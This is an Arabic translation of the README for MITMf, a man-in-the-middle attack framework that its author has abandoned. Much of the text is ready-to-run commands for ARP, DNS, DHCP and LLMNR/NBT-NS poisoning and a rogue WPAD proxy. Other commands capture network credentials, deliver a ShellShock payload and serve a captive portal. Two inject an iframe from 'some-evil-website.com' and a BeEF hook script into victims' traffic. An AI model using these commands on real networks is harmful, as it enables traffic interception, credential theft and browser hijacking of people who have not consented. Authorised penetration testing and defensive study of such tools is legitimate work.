إطار عمل هجمات الرجل في الوسط
لم يعد يتم تحديث هذا المشروع. تمت كتابة MITMf لتلبية الحاجة في ذلك الوقت إلى أداة حديثة لتنفيذ هجمات Man-In-The-Middle. منذ ذلك الحين تم إنشاء العديد من الأدوات الأخرى لملء هذه المساحة، ربما ينبغي عليك استخدام Bettercap نظرًا لأنه أكثر اكتمالًا بكثير من الميزات ويتم صيانته بشكل أفضل.
برامج تعليمية سريعة وأمثلة وتحديثات للمطورين على: https://byt3bl33d3r.github.io
تعتمد هذه الأداة على sergio-proxy وهي محاولة لإحياء المشروع وتحديثه.
اتصل بي على:
قبل إرسال المشكلات، يرجى قراءة القسم ذي الصلة في الويكي.
يرجى الرجوع إلى الويكي للحصول على تعليمات التثبيت
يهدف MITMf إلى توفير متجر شامل لهجمات Man-In-The-Middle وهجمات الشبكة أثناء تحديث وتحسين الهجمات والتقنيات الحالية.
تم تصميمه في الأصل لمعالجة أوجه القصور الكبيرة في الأدوات الأخرى (مثل Ettercap وMallory)، وقد تمت إعادة كتابته بالكامل تقريبًا من الصفر لتوفير إطار عمل معياري وقابل للتوسيع بسهولة يمكن لأي شخص استخدامه لتنفيذ هجوم MITM الخاص به.
يحتوي الإطار على خادم SMB وHTTP وDNS مدمج يمكن التحكم فيه واستخدامه بواسطة المكونات الإضافية المختلفة، ويحتوي أيضًا على نسخة معدلة من وكيل SSLStrip الذي يسمح بتعديل HTTP وتجاوز HSTS جزئيًا.
اعتبارًا من الإصدار 0.9.8، يدعم MITMf تصفية الحزم النشطة ومعالجتها (أساسًا ما فعلته etterfilters، ولكن بشكل أفضل)، مما يسمح للمستخدمين بتعديل أي نوع من حركة المرور أو البروتوكول.
يمكن تحرير ملف التكوين أثناء تشغيل MITMf، وسيتم تمرير التغييرات عبر إطار العمل: يتيح لك ذلك تعديل إعدادات المكونات الإضافية والخوادم أثناء تنفيذ الهجوم.
سيقوم MITMf بالتقاط بيانات FTP وIRC وPOP وIMAP وTelnet وSMTP وSNMP (سلاسل المجتمع) وNTLMv1/v2 (جميع البروتوكولات المدعومة مثل HTTP وSMB وLDAP وما إلى ذلك) وبيانات اعتماد Kerberos باستخدام Net-Creds، والتي يتم تشغيلها على بدء.
يتيح تكامل المستجيب إمكانية تسميم LLMNR وNBT-NS وMDNS ودعم خادم WPAD المارق.
يمكنك الآن تعديل أي حزمة/بروتوكول يتم اعتراضه بواسطة MITMf باستخدام Scapy! (لا مزيد من المرشحات الإلكترونية! رائع!)
على سبيل المثال، إليك مرشح صغير غبي يقوم فقط بتغيير عنوان IP الوجهة لحزم ICMP:
if packet . haslayer ( ICMP ):
log . info ( 'Got an ICMP packet!' )
packet . dst = '192.168.1.0'
packet
للوصول إلى الحزمة بتنسيق متوافق مع Scapydata
للوصول إلى بيانات الحزمة الأولية الآن لاستخدام الفلتر، كل ما يتعين علينا فعله هو: python mitmf.py -F ~/filter.py
ربما ترغب في دمج ذلك مع البرنامج المساعد Spoof لاعتراض الحزم من شخص آخر؛)
ملاحظة : يمكنك تعديل عوامل التصفية أثناء التنقل دون إعادة تشغيل MITMf!
الاستخدام الأساسي، يبدأ تشغيل وكيل HTTP SMB وDNS وخوادم HTTP وNet-Creds على الواجهة enp3s0:
python mitmf.py -i enp3s0
يقوم ARP بتسميم الشبكة الفرعية بأكملها باستخدام البوابة الموجودة على 192.168.1.1 باستخدام المكون الإضافي Spoof :
python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1
كما هو مذكور أعلاه + خادم وكيل WPAD مخادع باستخدام المكون الإضافي Responder :
python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --responder --wpad
سم ARP 192.168.1.16-45 و192.168.0.1/24 مع البوابة على 192.168.1.1:
python mitmf.py -i enp3s0 --spoof --arp --target 192.168.2.16-45,192.168.0.1/24 --gateway 192.168.1.1
تمكين انتحال DNS أثناء تسميم ARP (يتم سحب النطاقات المراد انتحالها من ملف التكوين):
python mitmf.py -i enp3s0 --spoof --dns --arp --target 192.168.1.0/24 --gateway 192.168.1.1
تمكين انتحال LLMNR/NBTNS/MDNS:
python mitmf.py -i enp3s0 --responder --wredir --nbtns
تمكين انتحال DHCP (يتم سحب تجمع IP والشبكة الفرعية من ملف التكوين):
python mitmf.py -i enp3s0 --spoof --dhcp
كما هو مذكور أعلاه مع حمولة ShellShock التي سيتم تنفيذها إذا كان أي عميل معرضًا للخطر:
python mitmf.py -i enp3s0 --spoof --dhcp --shellshock 'echo 0wn3d'
قم بإدخال HTML IFrame باستخدام البرنامج المساعد Inject :
python mitmf.py -i enp3s0 --inject --html-url http://some-evil-website.com
أدخل برنامج نصي JS:
python mitmf.py -i enp3s0 --inject --js-url http://beef:3000/hook.js
ابدأ بوابة مقيدة تعيد توجيه كل شيء إلى http://SERVER/PATH:
python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --captive --portalurl http://SERVER/PATH
ابدأ تشغيل البوابة المقيدة على http://your-ip/portal.html باستخدام الصفحة الافتراضية /portal.html (المستجيب thx) و/CaptiveClient.exe (غير مضمن) من المجلد config/captive:
python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --captive
كما هو مذكور أعلاه ولكن مع اسم المضيف captive.portal بدلاً من IP (يتطلب captive.portal للحل مع عنوان IP الخاص بك، على سبيل المثال عبر محاكاة DNS):
python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --dns --captive --use-dns
قم بخدمة بوابة مقيدة باستخدام مثيل SimpleHTTPServer إضافي يخدم LOCALDIR على http://IP:8080 (قم بتغيير المنفذ في mitmf.config):
python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --captive --portaldir LOCALDIR
نفس ما ورد أعلاه ولكن مع اسم المضيف:
python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --dns --captive --portaldir LOCALDIR --use-dns
وأكثر من ذلك بكثير!
بالطبع يمكنك مزج ومطابقة أي مكون إضافي تقريبًا معًا (مثل ARP spoof + inject + Responder وما إلى ذلك.)
للحصول على قائمة كاملة بالخيارات المتاحة، ما عليك سوى تشغيل python mitmf.py --help
بي تي سي: 1ER8rRE6NTZ7RHN88zc6JY87LvtyuRUJGU
إيثريوم: 0x91d9aDCf8B91f55BCBF0841616A01BeE551E90ee
LTC: LLMa2bsvXbgBGnnBwiXYazsj7Uz6zRe4fr